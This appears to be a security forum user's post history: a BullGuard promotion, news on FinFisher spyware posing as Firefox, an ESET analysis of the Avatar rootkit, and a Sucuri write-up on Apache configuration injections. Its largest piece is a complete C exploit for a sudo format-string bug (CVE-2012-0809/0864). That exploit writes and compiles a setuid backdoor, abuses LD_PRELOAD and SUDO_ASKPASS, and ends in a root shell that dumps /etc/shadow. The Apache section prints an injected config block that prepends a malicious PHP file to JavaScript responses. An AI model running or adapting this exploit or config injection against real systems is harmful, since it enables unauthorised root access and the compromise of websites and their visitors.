Everything posted by Nytro (18715 posts, 701 days won)
DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow
Nytro replied to neox's topic in Exploituri
Hmm, wouldn't a detailed start-to-finish tutorial be nice?
-
#include <string>
using namespace std;
// Romanian joke: FOLOSITI_BA_STRING = "USE std::string, DAMN IT"; OBIECTE = "OBJECTS"
string FOLOSITI_BA_STRING = "OBIECTE";
-
[h=1]Bullguard Internet Security 2013 – 90-day FREE license[/h]
By Radu FaraVirusi(com) on May 1, 2013

BullGuard, the Danish security vendor, has released version 13 (2013) of BullGuard Internet Security, which bundles the antivirus technology from BitDefender and the firewall from Outpost. With excellent test results and very good protection, you can now have it for free for 3 months. To get BullGuard Internet Security 2013, the final version with a 3-month FREE license, go to: https://www.bullguard.com/landing-pages/aff/general50ooff90days.aspx

Source: Bullguard Internet Security 2013 – 90 de zile licenta GRATUITA
-
[h=1]With the Rise of Coding, Comes the Rise of Malware[/h]

I'm sure you might have read recent articles about how coding is going to be the ultimate skill in the coming years. Seems like this might as well be true, so it's being pushed with the various online schools being developed (the list is getting exhaustive). With this huge rise of training comes a huge rise of smarter hackers and malware writers.

What is it about malware that seems so attractive? Money, fun, damage, etc.? We can get a glimpse of reality when we see the statistics on antivirus vendor websites; some say a million new samples are added weekly. Many of these issues arise out of the violence of society or the outward shame that is inflicted upon other people through the art of cyberbullying, hacking, and other threatening tasks. What's more is that when we study these aspects, we get a sense that most malware is targeting our wallets, stealing our identities. We need better protection.

This is a call to someone who can make better, user-friendly operating systems. If you know how to code or are training, please make sure to use it for good. You could in fact become a lot richer making top security software than becoming a hacker, stealing and risking it all. What's better for you? Helping or hurting? Good wallet or prison time? Make your choice. Better humanity through an act of good will. Get out there and code for the good! Make a difference! BE THE DIFFERENCE! Don't be afraid to try new things. Set impossible goals. Shoot yourself into the future of technology and skyscrape the world over with your amazing new security software. Something's gotta give! And if something doesn't happen soon, our threatening internet culture could begin to control us and steal our money. We'll have a very unfair world by then. What if we impose CISPA? That'll make a lot of people happy but also a lot of people mad.

Source: With the Rise of Coding, Comes the Rise of Malware | Secure Connexion
-
[h=1]Spyware used by governments poses as Firefox, and Mozilla is angry[/h]
[h=2]Mozilla sends cease and desist letter to maker of FinFisher software.[/h]
by Jon Brodkin - May 1 2013, 7:41pm

Image caption: That's not the real Firefox, either. (Nayu Kim)

Mozilla has sent a cease-and-desist letter to a company that sells spyware allegedly disguised as the Firefox browser to governments. The action follows a report by Citizen Lab, which identifies 36 countries (including the US) hosting command and control servers for FinFisher, a type of surveillance software. Also known as FinSpy, the software is sold by UK-based Gamma International to governments, which use it in criminal investigations and allegedly for spying on dissidents.

Mozilla revealed yesterday in its blog that it has sent the cease and desist letter to Gamma "demanding that these illegal practices stop immediately." Gamma's software is "designed to trick people into thinking it's Mozilla Firefox," Mozilla noted. (Mozilla declined to provide a copy of the cease and desist letter to Ars.)

The spyware doesn't infect Firefox itself, so a victim's browser isn't at risk. But the spyware "uses our brand and trademarks to lie and mislead as one of its methods for avoiding detection and deletion" and is "used by Gamma's customers to violate citizens' human rights and online privacy," Mozilla said. Mozilla continues:

Through the work of the Citizen Lab research team, we believe Gamma's spyware tries to give users the false impression that, as a program installed on their computer or mobile device, it's related to Mozilla and Firefox, and is thus trustworthy both technically and in its content. This is accomplished in two ways:
1. When a user examines the installed spyware on his/her machine by viewing its properties, Gamma misrepresents its program as "Firefox.exe" and includes the properties associated with Firefox along with a version number and copyright and trademark claims attributed to "Firefox and Mozilla Developers."
2. For an expert user who examines the underlying code of the installed spyware, Gamma includes verbatim the assembly manifest from Firefox software.

The Citizen Lab research team has provided us with samples from the following three instances that demonstrate how this misuse of our brand, trademarks and public trust is a designed feature of Gamma's spyware products and not unique to a single customer's deployment:
- A spyware attack in Bahrain aimed at pro-democracy activists;
- The recent discovery of Gamma's spyware apparently in use amidst Malaysia's upcoming General Elections; and
- A promotional demo produced by Gamma.

Each sample demonstrates the exact same pattern of falsely designating the installed spyware as originating from Mozilla. Gamma's own brochures and promotional videos tout that one of the essential features of its surveillance software is that it can be covertly deployed on the person's system and remain undetected.

The Citizen Lab report provides pictorial evidence of the impersonation:

FinFisher doesn't just masquerade as Firefox. The Citizen Lab report says it has also been used to target Malay language speakers by "masquerading as a document discussing Malaysia's upcoming 2013 General Elections."

The countries where Citizen Lab identified FinFisher command-and-control servers are Australia, Austria, Bahrain, Bangladesh, Brunei, Bulgaria, Canada, Czech Republic, Estonia, Ethiopia, Germany, Hungary, India, Indonesia, Japan, Latvia, Lithuania, Macedonia, Malaysia, Mexico, Mongolia, Netherlands, Nigeria, Pakistan, Panama, Qatar, Romania, Serbia, Singapore, South Africa, Turkey, Turkmenistan, United Arab Emirates, United Kingdom, United States, and Vietnam.

We've asked Gamma if the company has a response to Mozilla's cease and desist letter but haven't heard back yet.

Source: http://arstechnica.com/information-technology/2013/05/spyware-used-by-governments-poses-as-firefox-and-mozilla-is-angry/
-
[h=1]Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication[/h]

The story of the mysterious malware detected by ESET as Win32/Rootkit.Avatar began in February 2013, when some adverts for this rootkit leaked from Russian cybercrime forums (http://pastebin.com/maPY7SS8). This information produced some heated discussions in the malware research community; however, a sample of the Avatar rootkit was not found and published, until now. In this blog we present an in-depth analysis of the Win32/Rootkit.Avatar family, which has some surprising features and is currently available for sale or rent in the crimeware marketplace.

In March ESET detected two droppers with different C&Cs and compilation time stamps:

Win32/Rootkit.Avatar uses a driver infection technique twice: first in the dropper, so as to bypass detection by HIPS, and second in the rootkit driver, so as to survive a system reboot. The infection technique is restricted in its capability (by the code signing policy for kernel-mode modules), and Win32/Rootkit.Avatar works only on x86 systems. Some years ago we analyzed in detail how the TDL3 rootkit family also infected system drivers in order to survive a reboot (TDL3: The Rootkit of All Evil?). Before 64-bit versions of Microsoft Windows became so prevalent, operating system tricks for infection using system drivers were really popular in rootkits, but the need to bypass the code signing policy has brought in a new generation of bootkits. More details about the complex bootkit family Win32/Gapz were presented a few weeks ago in our research whitepaper "Mind the Gapz: The most complex bootkit ever analyzed?".

[h=3]The Droppers[/h]

The first level dropper implements LZMA decompression for the second level dropper and the malicious driver module. The second level dropper and driver are unique in every instance, because the first level dropper generates random names for mutexes/events and applies modifications directly to the bodies of the modules.

The most interesting trick used in the first level dropper is an anti-debugging technique based on time comparison using the KUSER_SHARED_DATA.InterruptTime system structure. The first level dropper modifies the RtlDispatchException() routine inside the KiUserExceptionDispatcher() body. The next step raises an exception and passes control to the exception handler: the current time is collected from the KUSER_SHARED_DATA.InterruptTime system structure and compared during the next steps of execution. This non-standard trick can detect emulation or debugging in the first stages of dropper execution.

The second level dropper also has checks for known virtual machine software, but these checks are based on standard, already known tricks. Before the VM-checking code is executed, it is decrypted by XOR-based encryption using the key "explorer". In the next steps the operating system version and the current user's privilege level are checked. The second level dropper uses two ways of escalating privilege:
- exploitation of the MS11-080 vulnerability
- COM Elevation (UAC whitelist)

The system infection process by the dropper works as presented in the following diagram:

The exploit for the MS11-080 vulnerability uses the same exploitation code as the public exploit from the Metasploit Framework, with minor changes. After a version check for afd.sys the dropper uses the following exploitation code:

The next figure presents the code which triggers an AFDJoinLeaf pointer overwrite by sending a specific IOCTL code (0x000120BB):

The most interesting part of the exploit code is the steps taken after exploitation. After successful exploitation, kernel-mode shellcode is executed to load the malicious driver. The Avatar rootkit driver is not stored on the hard drive and loads only from a memory region. Here's the call graph for the routine that loads the malicious driver:

The other way to escalate privilege is an old technique based on COM Elevation (UAC whitelist). Upon successful escalation, the system directory (%WINDIR%\system32\drivers) is checked, searching for the driver to infect next. After successful infection the GsDriverEntry() routine is modified to execute the following malicious code stub. The modified GsDriverEntry() routine looks like this:

One of the main tasks of the malicious code stub is to attach itself to the second level dropper process and read the Avatar rootkit driver body into memory. The malicious code stub is presented in the following figure:

After a successful infection, the modified driver copies itself to the %TEMP% directory and tries to load itself using standard system techniques (Service Control Manager or ZwLoadDriver()). So the Avatar rootkit driver is not stored on the hard drive and is loaded with the same code used in the MS11-080 exploitation path for driver execution (see the call graph of the load_avatar_driver routine above). This method of loading the Avatar rootkit driver by system driver infection is effective for bypassing security software, and it loads other kernel-mode modules from a "trusted" (but malicious) system driver.

[h=3]Avatar rootkit driver[/h]

After the Avatar rootkit driver is loaded successfully, Avatar executes an algorithm for infecting system drivers so as to survive a reboot. In order to perform its infection, Avatar randomly chooses a driver and checks its name against a blacklist that varies for every Windows version. The execution flow for an infected system driver looks like this:
1. At the entry point, the following stub code is executed:
2. Then the GUID_DEVINTERFACE_DISK callback routine is installed into the system driver to load the Avatar rootkit driver from the hidden file storage. This is the same technique used by TDL3, TDL4 (The Evolution of TDL: Conquering x64) and Olmasco (MaxSS/SST).
3. The original code is restored in memory:

The Avatar rootkit driver is able to infect several system drivers without changing the original driver's file size.

The Avatar rootkit driver implements an interesting technique to detect the presence of a virtual machine environment. The driver calls the MmMapIoSpace() routine to read BIOS data at address 0xF0000 and checks for some specific strings:
- Parallels Software
- Virtual Machine
- VirtualBox
- QEMU BIOS
- VMware
- Bochs

Additional checks were also found for KVM and Hyper-V, based on already known tricks using cpuid instructions.

The hidden file system is used to store the user-mode payload module and additional files. All files are encrypted with a custom symmetric cipher. Here's the call graph for the routine that communicates with the hidden file system:

The attributes for files stored in the hidden file system look like this:

On the infected machine, additional user-mode and kernel-mode modules can be downloaded, executed and stored in the hidden file storage. Win32/Rootkit.Avatar does not store malicious components in any standard NTFS storage, except for the infected system drivers. The combination of encrypted hidden file storage and infected system drivers makes it harder to use typical forensic approaches to investigate an infection by Win32/Rootkit.Avatar.

The user-mode payload code injection uses the KeInitializeApc() routine to initialize a user-mode APC object and schedules the execution of this thread in the system process address space.

[h=3]Win32/Rootkit.Avatar Payload[/h]

The version of the payload in the currently researched sample of Win32/Rootkit.Avatar doesn't have many interesting features. Its main functionalities are:
- command center communications
- parsing configuration information
- read/write into hidden file storage
- communicating with the rootkit driver
- installing additional user-mode and kernel-mode modules

Of course, this means the initial infection can be the starting point of a variety of malicious activities, depending on the modules deployed. In our case the payload component avcmd.dll was injected into the svchost.exe system process, which started communicating with the C&C IP addresses stored in the configuration file. This configuration file has the following structure:
- name of the botnet
- command center URLs
- 1024-bit key for the custom encryption algorithm
- RSA-1024 public key
- name of the process for the subsequent code injection

Examples of decrypted configuration information from two different droppers are shown here:

In order to protect communications with the command center, a custom encryption algorithm is used, whose output is base64-encoded. All network communications are done from user mode and use standard WinINet API functions.

Win32/Rootkit.Avatar has an additional way of communicating with the C&C if the other methods are not working correctly. The payload tries to search for messages in Yahoo groups using special parameters. Search sequences are based on the following parameters (in our case 17BTN1 and 17NET1):

After the strings are concatenated, the resulting byte sequence is encrypted using a custom algorithm with a 1024-bit key from the configuration file.

BTN1 key = 6mQ98EXP3v7TKMdk704uOUzGqvikuoHt98n8IPp4K19a3qyZ96LoOc54sb3g9eJVyAs7VmPxQjkkM9R960ev275K24PQ550K19fNk8305jRDUTb4cEut4579Zg9i32qU
NET1 key = E623J5XKJ9NF4bseM5J2nkwhs1K2766DUOMUDSee3c7xu06Q9QayV61U4fm5H89ppuNgLt9M5D2XTCLcd0aS3m9CO1aZg9h9o2zb2EIC437IU3X1P3ec07481E0j2Tdr

After encryption, the resulting string is encoded with a base64 algorithm, after which all letters are converted to upper case and some symbols are filtered out. An example for botnet BTN1 looks like this:

SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP

EZTFDHWP is used for the subsequent search request on Yahoo groups. If the search request is successful, the next step is to check the group number and read the group description data. The group description is encrypted with the RSA algorithm and a 1024-bit private key. It is possible to decrypt this data with the public key stored in the configuration file. We suppose this information is the encrypted message used for returning control of a botnet without an active C&C.

After we identified this functionality, we started to search for possible messages on the Yahoo groups web site. Only one group was found with the relevant parameters (11BTN1 = EFS9KHRF). The search request looks like this: Yahoo! Groups: Search Results

An encrypted message is present in this group's description:

We were able to decrypt this message using the known RSA-1024 public keys from the configuration information. The key from the BTN1 botnet successfully decrypted this message:

dZ8FsJ4z0::http://www.avatarbut.info http://www.avatarsbut.info

This information looks similar to the C&Cs found in the BTN1 botnet configuration information. The authors of this blog post suspect that this Yahoo group was created to test this communication functionality, because it includes the same information already present in the BTN1 configuration file.

Avatar's scheme to maintain botnet control via Yahoo groups messages provides excellent protection against sinkhole attempts, because information about C&C domains is encrypted using an asymmetric algorithm based on the RSA scheme. In the reversing process, researchers can only extract the public key for decrypting messages; this key can't be used to encrypt new messages to create bogus groups.

[h=3]Avatar Runtime Library[/h]

Win32/Rootkit.Avatar has a special API for developing additional components without the source code of the Avatar rootkit. This development process is based around the Avatar Runtime Library, a special SDK for developing additional user-mode components which communicate with the Avatar rootkit driver. The Avatar Runtime Library has the following API functions:
- aTakeProcessToken() – assign the process token from one process to another
- aExecute() – execute a custom module in the context of a remote process
- aLoadDriver() – load a driver from the hidden file system
- aLoadFileFromAvatarDisk() – read a file from the hidden file system
- aSaveFileOrAttrToAvatarDisk() – write a file into the hidden file system
- aSendReport() – send a specific report to the C&C

The storage structure for payload injection into the user-mode process looks like this:

After analysis of the Avatar Runtime Library SDK, it looks like a development project by a really skilled system developer or developers. We think that the malware developers worked on it for not less than half a year, because many kernel-mode techniques need lengthy testing to ensure stability.

[h=3]Conclusion[/h]

Win32/Rootkit.Avatar is an interesting rootkit family using many interesting techniques for bypassing detection by security software. Rootkits at the level of sophistication of Avatar or Gapz can be used for long-term infection by the actor executing the attack. Avatar does not store its files in the standard file system, and its technique for driver infection makes it harder for typical forensic approaches to be used for successful incident investigation. Avatar also has additional ways to restore botnet control if the command center is taken down or the C&C is disrupted for other reasons. For cleaning it's necessary to first deactivate the Avatar rootkit driver and user-mode payload; only then is it possible to clean or restore the infected system driver.

Anton Cherepanov, Malware Researcher
Aleksandr Matrosov, Security Intelligence Team Lead

SHA1 hashes for analyzed samples:
Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57
Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde

Source: The mysterious Avatar rootkit
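The Yahoo-groups fallback channel in the post above is worth seeing end to end, because the sinkhole-resistance claim rests entirely on who holds which key. The following is an added example, not ESET's code and not Avatar's actual cipher: a toy model in which the operator signs the C&C message with an RSA private key and bots, carrying only the public key from their configuration, accept a group description only if it verifies. Everything here is assumed for illustration: textbook RSA over two fixed small primes (2^61-1 and the smallest prime above 2^32), SHA-256 as the digest, and the "<token>::<url> <url>" message shape taken from the decrypted sample quoted in the post. The function names are mine.

```python
"""Added example, not ESET's code and not Avatar's real scheme: a toy model of
the Yahoo-groups fallback channel.  The operator publishes a group description
only the holder of the RSA private key can produce; bots embed the matching
public key and accept only descriptions that verify.  A sinkholer who reversed
the sample holds the public key alone and cannot mint a valid description.
Toy textbook RSA with fixed small primes; not for real use."""
import base64
import hashlib
import secrets

# Fixed toy primes (assumed): 2**61 - 1 and the smallest prime above 2**32.
P = 2305843009213693951
Q = 4294967311
E = 65537


def make_toy_keypair():
    """Return ((n, e), (n, d)); the operator keeps (n, d), bots embed (n, e)."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)  # Python 3.8+ modular inverse; raises if gcd(E, phi) != 1
    return (n, E), (n, d)


def _sig_len(n):
    return (n.bit_length() + 7) // 8


def _digest_int(message, n):
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def publish_description(message, priv):
    """Operator side: sign the C&C message with d and pack signature||message
    as base64, the form a group description would carry."""
    n, d = priv
    sig = pow(_digest_int(message, n), d, n)
    return base64.b64encode(sig.to_bytes(_sig_len(n), "big") + message).decode()


def read_description(description, pub):
    """Bot side: return the message if the signature verifies under the
    embedded public key, otherwise None (the bot ignores that group)."""
    n, e = pub
    try:
        raw = base64.b64decode(description, validate=True)
    except ValueError:
        return None
    k = _sig_len(n)
    if len(raw) <= k:
        return None
    sig, message = int.from_bytes(raw[:k], "big"), raw[k:]
    if sig >= n or pow(sig, e, n) != _digest_int(message, n):
        return None
    return message


def parse_cc_message(message):
    """Split "<token>::<url> <url> ..." into (token, [urls])."""
    token, _, urls = message.partition(b"::")
    return token.decode(), urls.decode().split()


def forge_description(message, pub):
    """What a sinkholer can do without d: attach a random 'signature'."""
    n, _ = pub
    fake = secrets.randbelow(n).to_bytes(_sig_len(n), "big")
    return base64.b64encode(fake + message).decode()


if __name__ == "__main__":
    pub, priv = make_toy_keypair()
    # Constructed sample, shaped like the decrypted BTN1 description in the post.
    msg = b"dZ8FsJ4z0::http://www.avatarbut.info http://www.avatarsbut.info"
    print(parse_cc_message(read_description(publish_description(msg, priv), pub)))
    print(read_description(forge_description(b"x::http://sinkhole.invalid", pub), pub))
```

The second print is None: a defender who registers a group with the right search token still cannot redirect bots, which is exactly why the post calls the scheme sinkhole-resistant. Detection therefore has to target the search-token derivation or the group lookups themselves rather than the message contents.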
-
1,677,721,600,000,000 ways to encode <script>
Screenshot: https://twitter.com/soaj1664ashar/status/329107647087403009/photo/1
Paper: https://t.co/KMgpnS63RD
-
sudo_debug 1.8.0-1.8.3p1 format string root exploit

/*
 death-star.c

 sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass
 by aeon - http://infosecabsurdity.wordpress.com/

 This PoC exploits:
 - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow
 - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 "sudo_debug" format string

 Tested on:
 - Fedora core 16 verne
 - glibc 2.14.90.14 release
 - sudo 1.8.1p2

 Notes:
 - This exploit actually turned out very reliable
 - You can make a cleaner version of this exploit if you smash the sudo_debug function pointer
   or a libc function pointer so you don't write to disk. I won't be releasing that version

 References and thanks to:
 - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
 - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/
 - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/
 - "A Eulogy for Format Strings" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt

 [aeon@localhost tmp]$ gcc death-star.c -o death-star
 [aeon@localhost tmp]$ ./death-star
 [+] Targeting release: 3.1.0-7.fc16.i686.PAE
 [+] Found vuln glibc version: 2.14.90
 [+] Found a vuln sudo version: 1.8.1
 [+] Writing backdoor: e.c
 [+] Compiling backdoor: e
 [+] Writing SUDO_ASKPASS file: e.sh
 [+] Press enter when ready...
 < -------------- REMOVED -------------->
 AAF@F@F@F@F@' from LD_PRELOAD cannot be preloaded: ignored.
 %1073825311%21372736 %: settings: = %1073825311%21372736 %: settings: = %1073825311%21372736 %: sudo_mode 1081383169
 Sorry, try again.
 Sorry, try again.
 Sorry, try again.
 %20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts
 %1073886251%21372736 %: policy plugin returns 1081402445
 [+] Getting root..!
 [+] Cleaning system.
 [+] Launching root shell!
 sh-4.2# id; uname -a
 uid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
 Linux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux
 sh-4.2# head -n1 /etc/shadow
 root:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::
 sh-4.2#
*/

#include <sys/resource.h>
#include <sys/utsname.h>
#include <gnu/libc-version.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/wait.h>

#define OFFSET 65000
#define NUM_THREADS 0

/* files that we create on disk */
#define BACKDOOR "e.c"
#define BD_COMPILED "e"
#define SUDO_ASKPASS "e.sh"

extern char **environ;
struct utsname ver;

void kill_sudo(void);
void pop_shell(void);
void set_env(void);
int is_glibc_vuln(void);
int is_sudo_vuln(void);
int write_backdoor(void);

/* hardcoded path to sudo */
const char sudo[] = "/usr/bin/sudo\0";
char s_version[20];

/* vuln versions of sudo */
char vuln_sudo_versions[4][20] = { {"1.8.0"}, {"1.8.1"}, {"1.8.2"}, {"1.8.3"} };

/* vuln versions of glibc */
char vuln_glibc_versions[4][20] = { {"2.14.90"}, };

int main(int argc, char *argv[])
{
    struct rlimit rara;
    int status;
    char ready;
    pid_t pid;

    uname(&ver);
    printf("[+] Targeting release: %s\n", ver.release);

    /* bail out unless glibc and sudo are both vulnerable and the backdoor is in place */
    if (!is_glibc_vuln() || !is_sudo_vuln() || !write_backdoor())
        exit(0);
    printf("[+] Press enter when ready...");
    scanf("%c", &ready);

    /* unlimited stack */
    rara.rlim_max = rara.rlim_cur = RLIM_INFINITY;
    setrlimit(RLIMIT_STACK, &rara);

    if ((pid = fork()) < 0) {
        printf("[-] An error occurred while forking sudo\n");
        return -1;
    } else if (pid == 0) {
        /* child: poison the environment, then trigger the format string in sudo */
        set_env();
        kill_sudo();
    } else {
        /* parent: once sudo has run the askpass script as root, the backdoor is setuid */
        wait(&status);
        if (WIFEXITED(status)) {
            sleep(1);
            pop_shell();
        }
    }
    return 0;
}

int is_glibc_vuln(void)
{
    int i, returnval = 0;   /* the original returned -1 (truthy) on a miss; fixed */

    for (i = 0; i < 4; i++) {
        if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0) {
            printf("[+] Found vuln glibc version: %s\n", gnu_get_libc_version());
            returnval = 1;
        }
    }
    return returnval;
}

int is_sudo_vuln(void)
{
    int i, returnval = 0;
    FILE *fp;
    char path[21];          /* fgets() below reads up to 20 chars plus the NUL */
    char sudo_ver_cmd[50];

    snprintf(sudo_ver_cmd, sizeof(sudo) + 3, "%s -V", sudo);
    fp = popen(sudo_ver_cmd, "r");
    if (fp == NULL) {
        printf("[-] Failed to get sudo's version\n[-] Exiting..");
        exit(0);
    }
    /* first line is "Sudo version 1.8.1p2"; keep the "1.8.1" part */
    fgets(path, 21, fp);
    pclose(fp);
    memmove(s_version, path + 13, 5);

    for (i = 0; i < 4; i++) {
        if (strcmp(s_version, vuln_sudo_versions[i]) == 0) {
            printf("[+] Found a vuln sudo version: %s\n", s_version);
            returnval = 1;
        }
    }
    return returnval;
}

int write_backdoor(void)
{
    int returnval = 1;
    char askpass[100], compile_bd[100];
    /* the backdoor: once chown'd/chmod'd 4777 by the askpass script it pops a root shell */
    char bdcode[] =
        "#include <stdio.h>\r\n"
        "#include <stdlib.h>\r\n"
        "#include <unistd.h>\r\n"
        "int main(int argc, char **argv){\r\n"
        "    printf(\"[+] Getting root..!\\n\");\r\n"
        "    setresuid(0,0,0);\r\n"
        "    printf(\"[+] Cleaning system.\\n\");\r\n"
        "    remove(\"e\"); remove(\"e.c\"); remove(\"e.sh\");\r\n"
        "    printf(\"[+] Launching root shell!\\n\");\r\n"
        "    system(\"/bin/sh\");\r\n"
        "    exit(0);\r\n"
        "}\r\n";
    FILE *fp;

    fp = fopen(BACKDOOR, "wb");
    if (fp == NULL) {
        printf("[-] Failed to write backdoor on the target, check your permissions\n");
        return 0;
    }
    printf("[+] Writing backdoor: %s\n", BACKDOOR);
    fwrite(bdcode, 1, sizeof(bdcode) - 1, fp);
    fclose(fp);

    memset(compile_bd, 0x00, sizeof(compile_bd));
    snprintf(compile_bd, sizeof(BACKDOOR) + sizeof(BD_COMPILED) + 17,
             "/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED);
    printf("[+] Compiling backdoor: %s\n", BD_COMPILED);
    fp = popen(compile_bd, "r");
    if (fp == NULL) {
        printf("[-] Failed to compile the backdoor, check the gcc path\n");
        returnval = 0;
    } else {
        pclose(fp);     /* waits for gcc to finish */
    }

    /* SUDO_ASKPASS script: sudo -A runs it, and after exploitation it runs as root */
    memset(askpass, 0x00, sizeof(askpass));
    snprintf(askpass, sizeof(BD_COMPILED) * 2 + 39,
             "#!/bin/sh\nchown root:root %s\nchmod 4777 %s\n", BD_COMPILED, BD_COMPILED);
    fp = fopen(SUDO_ASKPASS, "w");
    if (fp == NULL) {
        printf("[-] Failed to write SUDO_ASKPASS file on the target, check your permissions\n");
        return 0;
    }
    printf("[+] Writing SUDO_ASKPASS file: %s\n", SUDO_ASKPASS);
    fwrite(askpass, 1, strlen(askpass), fp);
    fclose(fp);
    chmod(SUDO_ASKPASS, 0755);
    return returnval;
}

void set_env(void)
{
    int i;
    /* "LD_PRELOAD=" + OFFSET bytes of payload + NUL; the original buffer was OFFSET
       bytes and the copy ran 11 bytes past its end */
    char ld_preload_evar[OFFSET + 12] = "LD_PRELOAD=";
    char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};   /* 0x4001461f, repeated */
    char sudo_askpass_evar[40];

    /* fill user_details with the same 4-byte value over and over */
    for (i = 1; i < (OFFSET / 4); i++)
        memcpy(user_details + (i * 4), user_details, sizeof(int));
    memmove(ld_preload_evar + 11, user_details, sizeof(user_details));
    ld_preload_evar[OFFSET + 11] = '\0';

    memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));
    snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS) + 13, "SUDO_ASKPASS=%s", SUDO_ASKPASS);

    /* set our environment */
    putenv(ld_preload_evar);
    putenv(sudo_askpass_evar);
}

void kill_sudo(void)
{
    /* argv[0] is the format string: sudo_debug() feeds the program name to the
       format function (CVE-2012-0809); the huge positional index overflows
       FORTIFY_SOURCE's nargs counter (CVE-2012-0864) */
    char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$";
    char *args[] = { fmtstring, "-D9", "-A", "", NULL };

    /* trigger the vuln */
    execve(sudo, args, environ);
}

void pop_shell(void)
{
    char *exploit_args[] = { BD_COMPILED, NULL };

    /* clean our environment, then run the now setuid-root backdoor */
    unsetenv("LD_PRELOAD");
    unsetenv("SUDO_ASKPASS");
    execve(BD_COMPILED, exploit_args, environ);
}

Source: sudo_debug 1.8.0-1.8.3p1 format string root exploit - CXSecurity.com
-
Apache Web Server Attacks Continue to Evolve April 29, 2013 by Tony Perez For the past few months we have seen a gradual increase in server-level compromises. In fact, every week it seems we’re handling half a dozen or so and it continues to increase. It’s one of the reasons that I have started including this as a trend in my most recent Website Security presentations. Just last week we talked about some very sneaky hacks that targeted the Apache binaries directly in the place of the modules, contrary to what we had been seeing. Fortunately, the more sophisticated attack are still far and few in between leaving us to deal with rogue modules more often than not. The purpose of this image is to provide a logical representation of the evolution of website attacks. While websites are still the number one distribution mechanism, attackers are making a big effort to improve their attacks by going after server level applications in the place of the website itself, and it’s application (i.e., Custom ASP/PHP, WordPress, Joomla, etc..). The beauty of this is that the attacks becomes platform agnostic, in terms of the platform the end-user is utilizing. We’ve provided guidance in the past on how to identify these things both on CentOS / RedHat and Debian distro’s. That guidance is still the same, but I do want to add some more information around what the attackers are doing to make remediation more of a challenge lately. Two Specific Trends We’ll talk about two specific trends we’re seeing, in addition to the complex attacks targeting Apache binaries and modules. These are not as complex and easier to deploy, but still as dangerous and effective. They also raise concern because to accomplish either you’re looking at a user with administrative privileges, often root. 1. 
Appending Malware to Outgoing Data via Configuration Files

Found by our Analyst Cosmin Strimbu and Senior Analyst Fio Cavallari

A few months back, February 19th to be exact, I wrote about some sneaky JavaScript infections in which .htaccess was being used to add, what I like to call, junk in the trunk. But what's the obvious downside here? Well, if the server has many sites on it you have to do it on each one; how annoying is that. Well, the attackers agree, so they've moved their attack one layer down as well. No need to get fancy with Apache modules either, nah, let's just use the configuration files and do the same thing we were doing in .htaccess. Yes, that's sarcasm in my tone, and yes, that's what they're doing.

In a specific instance this is what they did: they modified this configuration file: /etc/httpd/conf.d/php.conf

And they added:

<files ~ "\.js$">
AddHandler php5-script .js
php_value auto_prepend_file /usr/local/lib/php.lib
php_flag display_errors Off
</files>

Here it's treating all JavaScript files as PHP and appending the payload found in this file: /usr/local/lib/php.lib to the outgoing traffic. Then it's turning off any errors that PHP might throw to avoid detection.

The next obvious question is, what's in that php.lib. Here is what we found in the file: /usr/local/lib/php.lib

This is what Google was blacklisting:

From the code above you can see that the target of this attack was Internet Explorer. If the right user agent was identified then the attacker was generating a random subdomain on the statistic-online website and sending the user to the malicious payload. Unfortunately we didn't pull the payload down in time, so it's hard to say exactly what it was attempting.

2. Disabling Root Changes on Infected Files

Yes, there is a way to take away the administrator's ability to modify files, any file, on your server. It's known as making a file immutable, and you accomplish this by changing the file's attributes using the chattr command. The command is very similar to the attrib command on DOS and Microsoft Windows.

A good sign that you might be dealing with this is if you're logged into your server as root, or with a user that has administrator permissions, and when you make a change you see:

W10: Warning: Changing a read-only file

Or if you try to save and you see:

"/etc/httpd/conf.d/ssl.conf" E212: Can't open file for writing

This is a good time to make use of the list command, but append the attr option so that it looks like this:

# lsattr filename

In my example it'd be:

# lsattr /etc/httpd/conf.d/ssl.conf

You're likely to see something like this:

----ia------- /etc/httpd/conf.d/ssl.conf

The i and a attributes each mean something unique. The i sets it to immutable so no one can mess with it, but the a option makes it so that you can append to an existing file but you can't modify existing data. You should make note, however, that the only user that can modify these attributes is your root user, so this is a good sign that it's likely compromised. Regardless, if this is the case, you can, thankfully, remove the restriction by doing:

# chattr -ia /etc/httpd/conf.d/ssl.conf

In this case the - will remove the restriction while the + will add it. Once that is done you should see this:

# lsattr /etc/httpd/conf.d/ssl.conf
------------- /etc/httpd/conf.d/ssl.conf

Now you're back in business and removing things like this:

LoadModule uni_config_module modules/mod/mod_uni_config.so

